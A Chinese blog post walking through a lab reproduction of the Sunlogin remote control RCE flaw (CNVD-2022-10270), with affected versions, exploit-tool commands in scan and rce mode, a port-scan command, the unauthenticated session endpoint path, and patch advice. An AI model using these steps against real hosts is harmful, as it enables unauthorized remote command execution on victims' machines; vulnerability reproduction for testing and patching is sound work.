漏洞复现篇--向日葵远程命令代码执行

向日葵远程控制软件远程代码执行漏洞(CNVD-2022-10270, CNVD-2022-03672)

一、漏洞描述

向日葵是一款集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。向日葵远程控制软件存在未授权访问漏洞,启动服务端软件后,会开放未授权访问端口,攻击者可通过未授权访问无需密码直接获取session,并借此远程执行任意代码。

二、影响版本

向日葵个人版 for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.433152021.12

三、环境搭建

靶机:windows 192.168.101.140和向日葵的漏洞版本

image

四、漏洞复现

4.1 检测工具复现

https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

4.1.1 漏洞检测

-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令

xrkRce.exe -h 192.168.101.140 -t scan

image

4.1.2 远程命令执行

xrkRce.exe -h 192.168.101.140 -t rce -p 扫描出的端口号 -c "执行的命令"

image

4.2 手动漏洞复现

4.2.1 使用Nmap或其它探测工具进行端口扫描

namp -A -p 40000-65535 192.168.101.140

image

4.2.2 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)对端口尝试

image

4.2.3 拿到CID-添加payload和cookie-发送

image

五、修复建议

向日葵官方已发布了修复版本,请及时更新:https://sunlogin.oray.com/

参考文章:
https://www.cnblogs.com/peace-and-romance/p/15905365.html

posted @   椰什么子  阅读(338)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
· AI与.NET技术实操系列(六):基于图像分类模型对图像进行分类
点击右上角即可分享
微信分享提示